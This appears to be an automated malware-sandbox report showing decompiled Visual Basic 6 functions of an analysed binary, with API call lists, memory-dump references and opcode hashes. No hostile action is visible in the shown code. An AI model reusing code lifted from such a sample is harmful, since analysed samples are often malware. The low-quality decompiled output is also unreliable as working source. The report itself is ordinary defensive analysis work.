                                                        					 *((intOrPtr*)(_t70 + 0xc)) = _v68;
                                                        					__imp____vbaStrVarVal(_t53,  &_v48);
                                                        					_t54 =  *((intOrPtr*)( *_t74 + 0x1ec))(_t74, _t53);
                                                        					asm("fclex");
                                                        					if(_t54 < 0) {
                                                        						__imp____vbaHresultCheckObj(_t54, _t74, 0x4110d8, 0x1ec);
                                                        					}
                                                        					__imp____vbaFreeStr();
                                                        					__imp____vbaFreeObj();
                                                        					__imp____vbaFreeVar();
                                                        					_t73 = 0;
                                                        				}
                                                        				_t47 =  *((intOrPtr*)( *_t77 + 0x6fc))(_t77);
                                                        				_v8 = _t73;
                                                        				_push(0x41cdfe);
                                                        				return _t47;
                                                        			}





























                                                        0x0041cca3
                                                        0x0041ccb2
                                                        0x0041ccb9
                                                        0x0041ccbf
                                                        0x0041ccc2
                                                        0x0041ccc9
                                                        0x0041ccd1
                                                        0x0041ccd4
                                                        0x0041ccd8
                                                        0x0041ccdd
                                                        0x0041cce0
                                                        0x0041cce0
                                                        0x0041cce6
                                                        0x0041ccea
                                                        0x0041cced
                                                        0x0041ccf0
                                                        0x0041ccf3
                                                        0x0041ccf6
                                                        0x0041ccf9
                                                        0x0041ccfe
                                                        0x0041cd06
                                                        0x0041cd09
                                                        0x0041cd10
                                                        0x0041cd19
                                                        0x0041cd1d
                                                        0x0041cd27
                                                        0x0041cd37
                                                        0x0041cd3b
                                                        0x0041cd46
                                                        0x0041cd48
                                                        0x0041cd4f
                                                        0x0041cd56
                                                        0x0041cd66
                                                        0x0041cd68
                                                        0x0041cd6d
                                                        0x0041cd73
                                                        0x0041cd76
                                                        0x0041cd79
                                                        0x0041cd81
                                                        0x0041cd89
                                                        0x0041cd91
                                                        0x0041cd93
                                                        0x0041cda1
                                                        0x0041cda1
                                                        0x0041cdaa
                                                        0x0041cdb3
                                                        0x0041cdbc
                                                        0x0041cdc2
                                                        0x0041cdc2
                                                        0x0041cdc7
                                                        0x0041cdcd
                                                        0x0041cdd0
                                                        0x00000000

                                                        APIs
                                                          • Part of subcall function 0041DA00: __vbaNew2.MSVBVM60(0040B730,?,00000000,004016F0,00401724), ref: 0041DA46
                                                          • Part of subcall function 0041DA00: __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041DA67
                                                          • Part of subcall function 0041DA00: __vbaVarTextTstEq.MSVBVM60(?,?), ref: 0041DA78
                                                          • Part of subcall function 0041DA00: __vbaFreeVar.MSVBVM60 ref: 0041DA83
                                                          • Part of subcall function 0041DA00: __vbaVarMove.MSVBVM60 ref: 0041DAA5
                                                        • __vbaVarTstEq.MSVBVM60(?,?,?,00401724), ref: 0041CD10
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041CD1D
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041CD3B
                                                          • Part of subcall function 0041D830: __vbaNew2.MSVBVM60(0040B730,?,0041A58C,0040160E,00000000), ref: 0041D873
                                                          • Part of subcall function 0041D830: __vbaHresultCheckObj.MSVBVM60(00000000,0040160E,00411158,00000028), ref: 0041D894
                                                          • Part of subcall function 0041D830: __vbaVarMove.MSVBVM60 ref: 0041D8A0
                                                          • Part of subcall function 0041D830: __vbaNew2.MSVBVM60(0040B730,?), ref: 0041D8B0
                                                          • Part of subcall function 0041D830: __vbaHresultCheckObj.MSVBVM60(00000000,0040160E,00411158,00000024), ref: 0041D8D1
                                                          • Part of subcall function 0041D830: __vbaObjSetAddref.MSVBVM60(?,?), ref: 0041D8DC
                                                          • Part of subcall function 0041D830: __vbaFreeObj.MSVBVM60 ref: 0041D8E5
                                                        • __vbaStrVarVal.MSVBVM60(?,?), ref: 0041CD81
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004110D8,000001EC), ref: 0041CDA1
                                                        • __vbaFreeStr.MSVBVM60 ref: 0041CDAA
                                                        • __vbaFreeObj.MSVBVM60 ref: 0041CDB3
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041CDBC
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Free$CheckHresult$New2$Move$AddrefText
                                                        • String ID:
                                                        • API String ID: 1958995884-0
                                                        • Opcode ID: 7beee8e3230af983d5d0d36260d709c3d97969727100c4d91b5e4ffed9991194
                                                        • Instruction ID: 216af6537d7fe68e7bcb3f168ccfc5d9b30925e2f8a028a7b625b906e42be39d
                                                        • Opcode Fuzzy Hash: 7beee8e3230af983d5d0d36260d709c3d97969727100c4d91b5e4ffed9991194
                                                        • Instruction Fuzzy Hash: 36410BB1D00249EFCB00DFA9D9889EEFBB8FF48704F10812AE455A7250DB746946CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 20%
                                                        			E00416AA0(short* _a8) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v16;
                                                        				intOrPtr _v20;
                                                        				intOrPtr _v24;
                                                        				intOrPtr _v28;
                                                        				intOrPtr _v36;
                                                        				short _v40;
                                                        				short _v48;
                                                        				short _v52;
                                                        				void* _t34;
                                                        				void* _t44;
                                                        				void* _t46;
                                                        				intOrPtr _t48;
                                                        
                                                        				 *[fs:0x0] = _t48;
                                                        				L00401D20();
                                                        				_v28 = _t48;
                                                        				_v24 = 0x401378;
                                                        				_v20 = 0;
                                                        				_v16 = 0;
                                                        				_v8 = 1;
                                                        				_v8 = 2;
                                                        				__imp____vbaOnError(0xffffffff, _t44, _t46, _t34,  *[fs:0x0], 0x401d26);
                                                        				_v8 = 3;
                                                        				E0040F6F8();
                                                        				_v52 = 0x24;
                                                        				__imp____vbaSetSystemError(0x10);
                                                        				if(_v52 < 0) {
                                                        					_v8 = 4;
                                                        					__imp____vbaI2I4();
                                                        					_v40 = 0x24;
                                                        				}
                                                        				_v8 = 6;
                                                        				E0040F6F8();
                                                        				_v52 = 0x24;
                                                        				__imp____vbaSetSystemError(0x11);
                                                        				if(_v52 < 0) {
                                                        					_v8 = 7;
                                                        					__imp____vbaI2I4();
                                                        					_v40 = 0x24;
                                                        				}
                                                        				_v8 = 9;
                                                        				E0040F6F8();
                                                        				_v52 = 0x24;
                                                        				__imp____vbaSetSystemError(0x12);
                                                        				if(_v52 < 0) {
                                                        					_v8 = 0xa;
                                                        					__imp____vbaI2I4();
                                                        					_v40 = 0x24;
                                                        				}
                                                        				_v8 = 0xc;
                                                        				_v48 = _v40;
                                                        				 *_a8 = _v48;
                                                        				 *[fs:0x0] = _v36;
                                                        				return 0;
                                                        			}
















                                                        0x00416ab2
                                                        0x00416abe
                                                        0x00416ac6
                                                        0x00416ac9
                                                        0x00416ad0
                                                        0x00416ad7
                                                        0x00416ade
                                                        0x00416ae5
                                                        0x00416aee
                                                        0x00416af4
                                                        0x00416afd
                                                        0x00416b02
                                                        0x00416b06
                                                        0x00416b11
                                                        0x00416b13
                                                        0x00416b1f
                                                        0x00416b25
                                                        0x00416b25
                                                        0x00416b29
                                                        0x00416b32
                                                        0x00416b37
                                                        0x00416b3b
                                                        0x00416b46
                                                        0x00416b48
                                                        0x00416b56
                                                        0x00416b5c
                                                        0x00416b5c
                                                        0x00416b60
                                                        0x00416b69
                                                        0x00416b6e
                                                        0x00416b72
                                                        0x00416b7d
                                                        0x00416b7f
                                                        0x00416b8d
                                                        0x00416b93
                                                        0x00416b93
                                                        0x00416b97
                                                        0x00416ba2
                                                        0x00416bad
                                                        0x00416bb5
                                                        0x00416bc2

                                                        APIs
                                                        • __vbaChkstk.MSVBVM60(?,00401D26), ref: 00416ABE
                                                        • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,00401D26), ref: 00416AEE
                                                        • __vbaSetSystemError.MSVBVM60(00000010,?,?,?,?,00401D26), ref: 00416B06
                                                        • __vbaI2I4.MSVBVM60 ref: 00416B1F
                                                        • __vbaSetSystemError.MSVBVM60(00000011), ref: 00416B3B
                                                        • __vbaI2I4.MSVBVM60 ref: 00416B56
                                                        • __vbaSetSystemError.MSVBVM60(00000012), ref: 00416B72
                                                        • __vbaI2I4.MSVBVM60 ref: 00416B8D
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Error$System$Chkstk
                                                        • String ID:
                                                        • API String ID: 1207130036-0
                                                        • Opcode ID: ea9604c5916d525a8328da06356a28026cd912875048fd067f192b200c4bdb86
                                                        • Instruction ID: 327cac6cddf6cd9854ff14e78122b0fc01e26885dc900f474e498e473df09a84
                                                        • Opcode Fuzzy Hash: ea9604c5916d525a8328da06356a28026cd912875048fd067f192b200c4bdb86
                                                        • Instruction Fuzzy Hash: EC312B74811258EAEB10EFE5DA097DDB7F0FF08708F10816EE901B76A0D7B91A84DB59
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaCastObj.MSVBVM60(00000000,00411580,?,?,?,?,?,00401D26), ref: 004212B3
                                                        • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,00401D26), ref: 004212C4
                                                        • __vbaObjSetAddref.MSVBVM60(004019A4,00000000,?,?,?,?,?,00401D26), ref: 004212CE
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,00401D26), ref: 004212D3
                                                        • __vbaNew.MSVBVM60(00411590,?,?,?,?,?,00401D26), ref: 004212DE
                                                        • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,00401D26), ref: 004212E9
                                                        • __vbaObjSetAddref.MSVBVM60(004019A4,00000000,?,?,?,?,?,00401D26), ref: 004212ED
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,00401D26), ref: 004212F2
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$AddrefFree$Cast
                                                        • String ID:
                                                        • API String ID: 1392565369-0
                                                        • Opcode ID: 5351791343b62573ab7622ea7e42c0724a9c9e6e1ce10e945ae8ba8bc7e4ee02
                                                        • Instruction ID: 6aa348e2409fc626726c32a0e11aaafdac8e423d8c066127c6e7128b407930ed
                                                        • Opcode Fuzzy Hash: 5351791343b62573ab7622ea7e42c0724a9c9e6e1ce10e945ae8ba8bc7e4ee02
                                                        • Instruction Fuzzy Hash: 7F0140B6900249BFD700AFA5DD46EEFBBBCEF58740F10442AFA01A3570D6745941CBA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 27%
                                                        			E0041CE20(void* __ebx, void* __edi, void* __esi, signed int _a4) {
                                                        				signed int _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				char _v28;
                                                        				char _v32;
                                                        				char _v48;
                                                        				intOrPtr _v52;
                                                        				intOrPtr _v60;
                                                        				signed int _v64;
                                                        				intOrPtr _v84;
                                                        				void* _t37;
                                                        				intOrPtr* _t39;
                                                        				char* _t45;
                                                        				void* _t46;
                                                        				signed int _t48;
                                                        				intOrPtr* _t52;
                                                        				intOrPtr* _t62;
                                                        				signed int _t64;
                                                        				signed int _t65;
                                                        				void* _t66;
                                                        				void* _t68;
                                                        				intOrPtr _t69;
                                                        				intOrPtr _t70;
                                                        
                                                        				_t69 = _t68 - 0xc;
                                                        				 *[fs:0x0] = _t69;
                                                        				_t70 = _t69 - 0x3c;
                                                        				_v16 = _t70;
                                                        				_v12 = 0x401700;
                                                        				_t64 = _a4;
                                                        				_v8 = _t64 & 0x00000001;
                                                        				_t65 = _t64 & 0xfffffffe;
                                                        				_a4 = _t65;
                                                        				 *((intOrPtr*)( *_t65 + 4))(_t65, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t66);
                                                        				_t7 = _t65 + 0x38; // 0x401738
                                                        				_t48 = 0;
                                                        				_v28 = 0;
                                                        				_v32 = 0;
                                                        				_v48 = 0;
                                                        				_v64 = 0;
                                                        				if(E0041E380(0, __edi, _t65, _t7) == 0) {
                                                        					_t39 =  &_v32;
                                                        					__imp____vbaObjSet(_t39,  *((intOrPtr*)( *_t65 + 0x308))(_t65));
                                                        					_t62 = _t39;
                                                        					_t14 = _t65 + 0x38; // 0x401738
                                                        					E0041E040(0x80020004, _t62, _t65,  &_v48, _t14);
                                                        					_t52 = _t70 - 0x10;
                                                        					_v84 =  *_t62;
                                                        					 *_t52 = 0xa;
                                                        					 *((intOrPtr*)(_t52 + 4)) = _v60;
                                                        					 *((intOrPtr*)(_t52 + 8)) = 0x80020004;
                                                        					 *((intOrPtr*)(_t52 + 0xc)) = _v52;
                                                        					_t45 =  &_v28;
                                                        					__imp____vbaStrVarVal(_t45,  &_v48);
                                                        					_t46 =  *((intOrPtr*)(_v84 + 0x1ec))(_t62, _t45);
                                                        					_t48 = 0;
                                                        					asm("fclex");
                                                        					if(_t46 < 0) {
                                                        						__imp____vbaHresultCheckObj(_t46, _t62, 0x4110d8, 0x1ec);
                                                        					}
                                                        					__imp____vbaFreeStr();
                                                        					__imp____vbaFreeObj();
                                                        					__imp____vbaFreeVar();
                                                        				}
                                                        				_t37 =  *((intOrPtr*)( *_t65 + 0x6f8))(_t65);
                                                        				if(_t37 < _t48) {
                                                        					__imp____vbaHresultCheckObj(_t37, _t65, 0x410b74, 0x6f8);
                                                        				}
                                                        				_v8 = _t48;
                                                        				_push(0x41cf5c);
                                                        				return _t37;
                                                        			}


























                                                        0x0041ce23
                                                        0x0041ce32
                                                        0x0041ce39
                                                        0x0041ce3f
                                                        0x0041ce42
                                                        0x0041ce49
                                                        0x0041ce51
                                                        0x0041ce54
                                                        0x0041ce58
                                                        0x0041ce5d
                                                        0x0041ce60
                                                        0x0041ce63
                                                        0x0041ce66
                                                        0x0041ce69
                                                        0x0041ce6c
                                                        0x0041ce6f
                                                        0x0041ce7a
                                                        0x0041ce8a
                                                        0x0041ce8e
                                                        0x0041ce94
                                                        0x0041ce96
                                                        0x0041cea3
                                                        0x0041ceb0
                                                        0x0041ceb4
                                                        0x0041ceb7
                                                        0x0041cebc
                                                        0x0041cec2
                                                        0x0041cec5
                                                        0x0041cecb
                                                        0x0041ced0
                                                        0x0041cedb
                                                        0x0041cee1
                                                        0x0041cee5
                                                        0x0041cee7
                                                        0x0041cef5
                                                        0x0041cef5
                                                        0x0041cefe
                                                        0x0041cf07
                                                        0x0041cf10
                                                        0x0041cf10
                                                        0x0041cf19
                                                        0x0041cf21
                                                        0x0041cf2f
                                                        0x0041cf2f
                                                        0x0041cf35
                                                        0x0041cf38
                                                        0x00000000

                                                        APIs
                                                          • Part of subcall function 0041E380: __vbaNew2.MSVBVM60(0040B730,?,?,00401700,00000000), ref: 0041E3C3
                                                          • Part of subcall function 0041E380: __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028,?,00401700,00000000), ref: 0041E3E4
                                                          • Part of subcall function 0041E380: __vbaVarTextTstEq.MSVBVM60(?,?,?,00401700,00000000), ref: 0041E3F5
                                                          • Part of subcall function 0041E380: __vbaFreeVar.MSVBVM60(?,00401700,00000000), ref: 0041E400
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041CE8E
                                                          • Part of subcall function 0041E040: __vbaNew2.MSVBVM60(0040B730,?,00000000,00401700,80020004), ref: 0041E083
                                                          • Part of subcall function 0041E040: __vbaHresultCheckObj.MSVBVM60(00000000,00401700,00411158,00000028,?,?,?,?,?,?,?,?,?,?,?,00401738), ref: 0041E0A4
                                                          • Part of subcall function 0041E040: __vbaVarMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401738,00401D26), ref: 0041E0B0
                                                          • Part of subcall function 0041E040: __vbaNew2.MSVBVM60(0040B730,?,?,?,?,?,?,?,?,?,?,?,?,00401738,00401D26), ref: 0041E0C0
                                                          • Part of subcall function 0041E040: __vbaHresultCheckObj.MSVBVM60(00000000,00401700,00411158,00000024,?,?,?,?,?,?,?,?,?,?,?,00401738), ref: 0041E0E1
                                                          • Part of subcall function 0041E040: __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401738,00401D26), ref: 0041E0EC
                                                          • Part of subcall function 0041E040: __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401738,00401D26), ref: 0041E0F5
                                                        • __vbaStrVarVal.MSVBVM60(?,?), ref: 0041CED0
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004110D8,000001EC), ref: 0041CEF5
                                                        • __vbaFreeStr.MSVBVM60 ref: 0041CEFE
                                                        • __vbaFreeObj.MSVBVM60 ref: 0041CF07
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041CF10
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401700,00410B74,000006F8), ref: 0041CF2F
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckFreeHresult$New2$AddrefMoveText
                                                        • String ID:
                                                        • API String ID: 1535432862-0
                                                        • Opcode ID: 39dbd0a0bc643378dd1014624c1853a9ac8910d729adec2d9477d7c4a1e1546b
                                                        • Instruction ID: abe30a7120a3155b0d7a314066ee02b126323e20a8f2c762e416aabec9f06969
                                                        • Opcode Fuzzy Hash: 39dbd0a0bc643378dd1014624c1853a9ac8910d729adec2d9477d7c4a1e1546b
                                                        • Instruction Fuzzy Hash: 4631507494024AAFCB00DFA5C9899DEBBB8FF08704F10852EF546E7691D7389986CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 24%
                                                        			E004182A0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
                                                        				char _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				void* _v28;
                                                        				intOrPtr _v32;
                                                        				intOrPtr _v40;
                                                        				char _v48;
                                                        				void* _t29;
                                                        				intOrPtr* _t30;
                                                        				void* _t31;
                                                        				signed int _t34;
                                                        				void* _t37;
                                                        				intOrPtr* _t41;
                                                        				intOrPtr* _t54;
                                                        				intOrPtr* _t56;
                                                        				intOrPtr* _t58;
                                                        				void* _t59;
                                                        				void* _t61;
                                                        				intOrPtr _t62;
                                                        				intOrPtr _t63;
                                                        
                                                        				_t62 = _t61 - 0xc;
                                                        				 *[fs:0x0] = _t62;
                                                        				_t63 = _t62 - 0x30;
                                                        				_v16 = _t63;
                                                        				_v12 = 0x401508;
                                                        				_v8 = 0;
                                                        				_t58 = _a4;
                                                        				 *((intOrPtr*)( *_t58 + 4))(_t58, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t59);
                                                        				_v28 = 0;
                                                        				_v48 = 0;
                                                        				_t29 =  *((intOrPtr*)( *_t58 + 0x2b0))(_t58,  &_v28);
                                                        				asm("fclex");
                                                        				if(_t29 >= 0) {
                                                        					_t41 = __imp____vbaHresultCheckObj;
                                                        				} else {
                                                        					_t41 = __imp____vbaHresultCheckObj;
                                                        					 *_t41(_t29, _t58, 0x40f430, 0x2b0);
                                                        				}
                                                        				_t30 = _v28;
                                                        				_t54 = _t30;
                                                        				_t31 =  *((intOrPtr*)( *_t30 + 0x3c))(_t30,  &_v48);
                                                        				asm("fclex");
                                                        				if(_t31 < 0) {
                                                        					 *_t41(_t31, _t54, 0x410678, 0x3c);
                                                        				}
                                                        				_t34 =  ~(0 | _v48 == 0x00000000);
                                                        				__imp____vbaFreeObj();
                                                        				if(_t34 != 0) {
                                                        					_t34 =  *((intOrPtr*)( *_t58 + 0x8a4))(_t58);
                                                        				}
                                                        				__imp____vbaI2I4();
                                                        				_t56 = _t63 - 0x10;
                                                        				 *(_t58 + 0x50) = _t34;
                                                        				 *_t56 = 8;
                                                        				 *((intOrPtr*)(_t56 + 4)) = _v40;
                                                        				 *(_t56 + 8) = L"ScrollBars";
                                                        				 *((intOrPtr*)(_t56 + 0xc)) = _v32;
                                                        				_t37 =  *((intOrPtr*)( *_t58 + 0x390))(_t58);
                                                        				asm("fclex");
                                                        				if(_t37 < 0) {
                                                        					_t37 =  *_t41(_t37, _t58, 0x40f430, 0x390);
                                                        				}
                                                        				_push(0x4183ac);
                                                        				return _t37;
                                                        			}























                                                        0x004182a3
                                                        0x004182b2
                                                        0x004182b9
                                                        0x004182bf
                                                        0x004182c2
                                                        0x004182cb
                                                        0x004182ce
                                                        0x004182d4
                                                        0x004182de
                                                        0x004182e1
                                                        0x004182e4
                                                        0x004182ec
                                                        0x004182ee
                                                        0x00418306
                                                        0x004182f0
                                                        0x004182f0
                                                        0x00418302
                                                        0x00418302
                                                        0x0041830c
                                                        0x00418316
                                                        0x00418318
                                                        0x0041831d
                                                        0x0041831f
                                                        0x0041832a
                                                        0x0041832a
                                                        0x00418338
                                                        0x0041833c
                                                        0x00418345
                                                        0x0041834a
                                                        0x0041834a
                                                        0x00418353
                                                        0x00418361
                                                        0x00418365
                                                        0x0041836e
                                                        0x00418374
                                                        0x00418377
                                                        0x0041837d
                                                        0x00418380
                                                        0x00418388
                                                        0x0041838a
                                                        0x00418398
                                                        0x00418398
                                                        0x0041839a
                                                        0x00000000

                                                        APIs
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401508,0040F430,000002B0), ref: 00418302
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410678,0000003C), ref: 0041832A
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041833C
                                                        • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418353
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401508,0040F430,00000390), ref: 00418398
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckHresult$Free
                                                        • String ID: ScrollBars
                                                        • API String ID: 3976024557-3358924163
                                                        • Opcode ID: 2ddb2dc95add79ded1bcbfe941e0db9d4e22d543f7465bfcf1a2e18eab6e9ed3
                                                        • Instruction ID: 88c6a321770787cc137e989cf8404dee28f7b2be1861ff3ee63a030beb800251
                                                        • Opcode Fuzzy Hash: 2ddb2dc95add79ded1bcbfe941e0db9d4e22d543f7465bfcf1a2e18eab6e9ed3
                                                        • Instruction Fuzzy Hash: 2A317270900304AFC700DFA9C949ADBBBF9FF58B00F14852EE555E7690DB79A8458B98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaNew2.MSVBVM60(0040B730,?,00000000,00401700,80020004), ref: 0041E083
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401700,00411158,00000028,?,?,?,?,?,?,?,?,?,?,?,00401738), ref: 0041E0A4
                                                        • __vbaVarMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401738,00401D26), ref: 0041E0B0
                                                        • __vbaNew2.MSVBVM60(0040B730,?,?,?,?,?,?,?,?,?,?,?,?,00401738,00401D26), ref: 0041E0C0
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401700,00411158,00000024,?,?,?,?,?,?,?,?,?,?,?,00401738), ref: 0041E0E1
                                                        • __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401738,00401D26), ref: 0041E0EC
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401738,00401D26), ref: 0041E0F5
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckHresultNew2$AddrefFreeMove
                                                        • String ID:
                                                        • API String ID: 761186269-0
                                                        • Opcode ID: 560a3dcd597402b791b5e8b89e03016b881d1fb502b4d6df532b9516abbed2ba
                                                        • Instruction ID: 75776c9786be6d04ac7cdc0b39a8c0ab4a0650c693c7e4535d323942b1380a1b
                                                        • Opcode Fuzzy Hash: 560a3dcd597402b791b5e8b89e03016b881d1fb502b4d6df532b9516abbed2ba
                                                        • Instruction Fuzzy Hash: 9E213D74940209BBCB109F55CD89EDABBB8FB59701F20402AF546B31A0D7746888CBA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaNew2.MSVBVM60(0040B730,?,0041A58C,0040160E,00000000), ref: 0041D873
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,0040160E,00411158,00000028), ref: 0041D894
                                                        • __vbaVarMove.MSVBVM60 ref: 0041D8A0
                                                        • __vbaNew2.MSVBVM60(0040B730,?), ref: 0041D8B0
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,0040160E,00411158,00000024), ref: 0041D8D1
                                                        • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0041D8DC
                                                        • __vbaFreeObj.MSVBVM60 ref: 0041D8E5
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckHresultNew2$AddrefFreeMove
                                                        • String ID:
                                                        • API String ID: 761186269-0
                                                        • Opcode ID: 75236f28268deefaa640679216c9989adff47f36a41fa1c2da724130fc1a8d6b
                                                        • Instruction ID: 4193a271b04162bfe98f5c40649446b1413f6bc0dd1a5f5878afc4e2b40bbb19
                                                        • Opcode Fuzzy Hash: 75236f28268deefaa640679216c9989adff47f36a41fa1c2da724130fc1a8d6b
